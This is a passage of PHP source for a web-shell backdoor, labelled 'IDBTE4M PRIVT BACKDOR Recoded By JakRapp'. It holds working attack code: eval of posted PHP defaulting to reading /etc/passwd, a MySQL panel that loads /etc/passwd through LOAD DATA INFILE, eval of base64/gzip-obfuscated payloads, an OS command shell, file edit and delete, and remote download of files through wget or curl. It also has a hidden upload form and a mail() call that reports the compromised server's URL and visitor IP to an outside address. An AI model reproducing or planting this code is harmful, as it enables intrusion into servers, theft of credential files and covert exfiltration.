3176.                        <table>
3177.                            <tr><td><form method="post"></td></tr>
3178.                            <tr><td><input class="inputz" size=50 type="text" name="link" placeholder="masukkan link config disini"></td></tr>
3179.  
3180.                            <tr><td>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input
3181. class="inputz" type="submit" value="Reset"></td></tr>
3182.                            </form>
3183.                        </table><br>
3184.               <a href="https://local-hunter.com/">Copyright All Reserved.</a>        
3185.            </center>
3186.  
3187.    </body>
3188. </html><br><br><br><br>';
3189.         }
3190. }
3191.     ?>
3192.  
3193.     </div></div></div></div></div></div>
3194. <?php
3195.     if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
3196.     <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
3197.     <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); }
3198.     else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea>
3199.     <tr><td><input style="width:6%;margin:0px;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form>
3200.     <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){
3201.     if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){
3202.     $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
3203.     if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
3204.     $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
3205.     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>"; if(isset($_GET['db']))
3206.     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
3207.     if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-></span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
3208.     $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
3209.     $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){
3210.     $db = $_GET['db']; $query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";
3211.     $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
3212.     $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables);
3213.     foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; }
3214.     elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array();
3215.     $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z']))
3216.     $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){
3217.     if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
3218.     for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){
3219.     if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) {
3220.     if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
3221.     $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?>
3222.     <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
3223.     <input type="hidden" name="x" value="mysql" />
3224.     <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr>
3225.     <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
3226.     <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
3227.     <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
3228.     <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form>
3229.     <?php }}
3230.     elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
3231.     elseif(isset($_GET['jak']) && ($_GET['jak'] == 'jump')){ @eval(gzinflate(base64_decode($jumper))); "</div>"; }
3232.     elseif(isset($_GET['jak']) && ($_GET['jak'] == 'ese')){ @eval(gzinflate(base64_decode($ekse))); "</div>"; }
3233.     elseif(isset($_GET['jak']) && ($_GET['jak'] == 'wpp')){ @eval(gzinflate(base64_decode($wpress))); "</div>"; }
3234.    
3235.     elseif(isset($_GET['view']) && ($_GET['view'] != "")){ if(is_file($_GET['view'])){ if(!isset($file)) $file = magicboom($_GET['view']); if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $filn = basename($file); echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span> <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" /> </form> </td></tr> <tr><td>Size</td><td>".ukuran($file)."</td></tr> <tr><td>Permission</td><td>".get_perms($file)."</td></tr> <tr><td>Owner</td><td>".$owner."</td></tr> <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr> <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr> <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr> <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr> </table> ";
3236.     if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
3237.     if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
3238.     <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
3239.     <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
3240.     <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
3241.     <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
3242.     $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
3243.     <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
3244.     <table class="tabnet" style="width:320px;padding:0 1px;">
3245.     <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
3246.     <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
3247.     <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
3248.     <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
3249.     <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
3250.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
3251.     <?php if(isset($_GET['jak']) && ($_GET['jak'] == '?')){ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $goks= 'yamaap92@gmail.com'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($goks, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }?>
3252.     <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
3253.     <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
3254.     <p><center><div class="info">-=[ IDBTE4M PRIVT BACKDOR Recoded By JakRapp ]=-</div>
3255. <?php if (isset($_GET['jakrapp'])) {
3256.     echo "<body bgcolor=white>
3257. <font color=black size=3>";
3258.     echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
3259. <label for=\"file\"></label>
3260. <input type=\"file\" name=\"file\" id=\"file\" />
3261. <br />
3262. <input type=\"submit\" name=\"submit\" value=\"UPLOAD\">
3263. </form>";
3264.     if ($_FILES["file"]["error"] > 0) {
3265.         echo "Error: " . $_FILES["file"]["error"] . "<br />";
3266.     } else {
3267.         echo "Upload: " . $_FILES["file"]["name"] . "<br />";
3268.         echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
3269.         echo "Stored in: " . $_FILES["file"]["tmp_name"];
3270.     }
3271.     if (file_exists("" . $_FILES["file"]["name"])) {
3272.         echo $_FILES["file"]["name"] . " already exists. ";
3273.     } else {
3274.         move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]);
3275.         echo "<br>Stored in: " . "" . $_FILES["file"]["name"];
3276.         echo "<hr>";
3277.     }
3278. }